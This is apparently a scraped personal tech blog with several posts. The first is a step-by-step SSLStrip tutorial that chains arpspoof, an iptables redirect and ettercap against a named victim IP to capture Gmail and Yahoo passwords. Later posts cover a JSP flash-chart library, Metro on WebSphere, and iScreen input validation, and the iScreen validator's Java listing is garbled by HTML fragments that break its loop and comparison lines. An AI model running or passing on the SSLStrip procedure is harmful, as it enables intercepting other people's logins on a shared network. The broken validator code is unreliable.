SSLStrip Step by Step on Ubuntu

SSLStrip used along with MITM to hack SSL websites.
You will need following tools

1. SSLStrip
2. arpspoof
3. ettercap
4. Ubuntu Linux
5. Internet Connection
6. Victim has to be in the same subnet

Step 1:- Download SSLStrip from http://www.thoughtcrime.org/software/sslstrip/

Step 2:- Unzip the downloaded files use "tar -zxvf sslstrip-0.4.tar.gz"


Step 3:- Build SSLStrip change directory to unzip folder run "python setup.py build"

Step 4:- Install SSLStrip run "sudo python setup.py install" , Requires root privilages

Step 5:- Install arpspoof "sudo apt-get install dsniff"

Step 6:- Install ettercap "sudo apt-get install ettercap"


Step 7:- Verify you ipaddress "ifconfig" Notice the hackers ip is 172.168.1.3


Step 8:- Verify your default gateway "ip route show | grep default | awk '{ print $3}' "

Note : This hack works only if victims gateway address is same as that of the Hacker. (172.168.1.1 in the above example)

Step 9:- Create three different tabs in your terminal window. We need to run three commands parallely. In first tab run " sudo arpspoof -t 172.168.1.4 172.168.1.1"


Step 10:- Second tab run "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000"
and run "sslstrip"


Step 11:- In the thisd tab run ettercap. Ethercap will print all the password it sniffed on the console. "sudo ettercap -Tqz"

Step 12:- Wait for the victim to login to gmail , yahoo etc.. the passwords will be printed on ettercap console.

jkookOFCTags Released

jkookOFCTags Released
Download link

jkookOFCTags is a jsp tag library for drawing flash charts. It is based on famous Open Flash Chart project
It extends of Open Flash Chart 2.x Library for Java
Depends on xstream1.3.1

Installing metro on WebSphere6.1

Installing metro on WebSphere6.1. WithOut installing feature pack

Create you web application.
Most important change is add
com.sun.xml.ws.transport.http.servlet.WSServlet and your webservices entries in web.xml and sun-jaxws.xml

Create EAR file

META-INF---\
Application.xml
webmodule.war---\
META-INF --\
MANIFEST.MF
webservices-api.jar
webservices-extra.jar
webservices-extra-api.jar
webservices-rt.jar
webservices-tools.jar


Remove conflicting jars from WEB-INF/lib
jaxb-api-1.5.jar
jaxb-impl-1.5.jar
jaxb-libs-1.5.jar
jaxb-xjc-1.5.jar
jaxrpc-api-1.1.jar
jaxrpc-impl-1.1.jar
jaxrpc-spi-1.1.jar
xerces-2.0.2.jar
xml-apis-2.0.2.jar


Contents of Application.XML

 1

 2 <application id="Application_ID1">

 3     <display-name>MyEnterpriseApplication</display-name>

 4     <module id="WarModule">

 5         <web>

 6             <web-uri>webmodule.war</web-uri>

 7             <context-root>/metrowebservices</context-root>

 8         </web>

 9     </module>

10 </application>

11

add following line to MANIFEST.MF
Class-Path: webservices-api.jar webservices-extra.jar webservices-extra-api.jar webservices-rt.jar webservices-tools.jar


Finally
ON IBM administration console
select : Classes loaded with application class loader first

What is a good password

Very nice article on Good passwords.
Strong password
Check your password strength

iScreen Validation in web application

iScreen validations provides server side validations. It provides elaborate documentation on how to implement your validations. There are two kinds of projects which need iScreen.
1) Project is in initial phases
2) Project is in advanced stages and we suddenly discover that there are no server side validations.
The later use case is challenging and tricky. This is my first blog entry in a series where I ll discuss how we have effectively implemented iScreen in a large project which has around 1600 separate screens.

Handling String Arrays

iScreen provides 'org.iscreen.StringValidator'. It provides length validation. However it does not handle values in an array. In our code we are passing requestMap as object to be validated. The requesr map contains request paramters as keys and values as haspmap value. Servlet creates an array of values when there are multiple fields with same name in the html form. The following code will not validate all the values in the "orderId" field.

<use-validator ref="org.iscreen.StringValidator" name="orderId">
<mapping from="#root.orderId" to="value" />
<label>Order Id</label>
<constraint property="minLength">10</constraint>
<constraint property="maxLength">10</constraint>
</use-validator>

First solution is modify the OGNL expression. The ognl expression will check the data type if it is an array then pass the first value in the array. The updated code

<use-validator ref="org.iscreen.StringValidator" name="orderId">
<mapping from="#root.orderId instanceof java.lang.String[] ? #root.orderId[0] : root.orderId" to="value" />
<label>Order Id</label>
<constraint property="minLength">10</constraint>
<constraint property="maxLength">10</constraint>
</use-validator>

The above code will only validate the first value in the array. This not sufficient in most cases

Solution is to extend the org.iscreen.StringValidator to handle array of values.
Following is the modified StringValidator class.

CustomStringValidator.java

 1 /*
 2  * Copyright 2006 Dan Shellman
 3  *
 4  * Licensed under the Apache License, Version 2.0 (the "License");
 5  * you may not use this file except in compliance with the License.
 6  * You may obtain a copy of the License at
 7  *
 8  * http://www.apache.org/licenses/LICENSE-2.0
 9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 package org.iscreen.validators;
17
18 import org.iscreen.SimpleBean;
19 import org.iscreen.ValidatorContext;
20
21 /**
22  * The CustomStringValidator checks the length of the given value in an array.
23  *
24  * @author Shrikant Sarda
25  */
26 public class CustomStringValidator extends StringValidator {
27
28     /**
29      * Default constructor.
30      */
31     public CustomStringValidator() {
32     } //end StringValidator()
33
34     public void validate(ValidatorContext context, Object beanToValidate) {
35         String value;
36         int valueLength;
37         String[] arrValue = null;
38
39         if (beanToValidate != null && ((SimpleBean) beanToValidate).getValue() != null) {
40             if (((SimpleBean) beanToValidate).getValue() instanceof String[]) {
41                 arrValue = (String[]) ((SimpleBean) beanToValidate).getValue();
42             }
43         }
44
45         if (arrValue != null) {
46             //System.out.println("in if");
47             //String[] customBeanToValidate = (String[])beanToValidate;
48             for (int i = 0; i < class="line-number">49                 value = arrValue[i];
50                 if (value == null) {
51                     if (minLength != null && minLength.intValue() > 0) {
52                         context.reportFailure(nullFailure);
53                     }
54
55                     return;
56                 }
57
58                 valueLength = value.length();
59                 if (minLength != null &&
60                         valueLength < class="line-number">61                     context.reportFailure(minLengthFailure, new Integer(valueLength));
62                 } else if (maxLength != null && maxLength.intValue() == 1 &&
63                         valueLength == 1) {
64                     //System.out.println("valueLength,78:" + valueLength + ",value:" + value);
65                 } else if (maxLength != null &&
66                         valueLength > maxLength.intValue()) {
67                     context.reportFailure(maxLengthFailure, new Integer(valueLength));
68                 }
69
70             } //end for
71         }// end if
72         else {
73             //System.out.println("in else");
74             value = getStringValue(beanToValidate);
75             if (value == null) {
76                 if (minLength != null && minLength.intValue() > 0) {
77                     context.reportFailure(nullFailure);
78                 }
79
80                 return;
81             }
82
83             valueLength = value.length();
84             if (minLength != null &&
85                     valueLength < class="line-number">86                 context.reportFailure(minLengthFailure, new Integer(valueLength));
87             } else if (maxLength != null && maxLength.intValue() == 1 &&
88                     valueLength == 1) {
89                 //System.out.println("valueLength,113:" + valueLength + ",value:" + value);
90             } else if (maxLength != null &&
91                     valueLength > maxLength.intValue()) {
92                 //System.out.println("valueLength,119:" + valueLength + ",value:" + value);
93                 context.reportFailure(maxLengthFailure, new Integer(valueLength));
94             }
95         }//end else
96     } //end validate()
97 } //end CustomStringValidator
98
99

Posting from ScribeFire

Posting from ScribFire. Checkout Vikrant


Today i have downloaded ScribFire and testing the same

WebApplicationFirewall using iScreen

Simplest solution for Application security is installing a web application firewall (WAF). Major function of WAF is to validate data. iScreen is one of the most popular validation frame work which can be used to build a firewall.

Most important feature of iScreen validation frame work is support for OGNL and MEVL. Given the full power of validations we can write a genric servlet filter which will act as a firewall. Let us look at various issues related to validations and WAF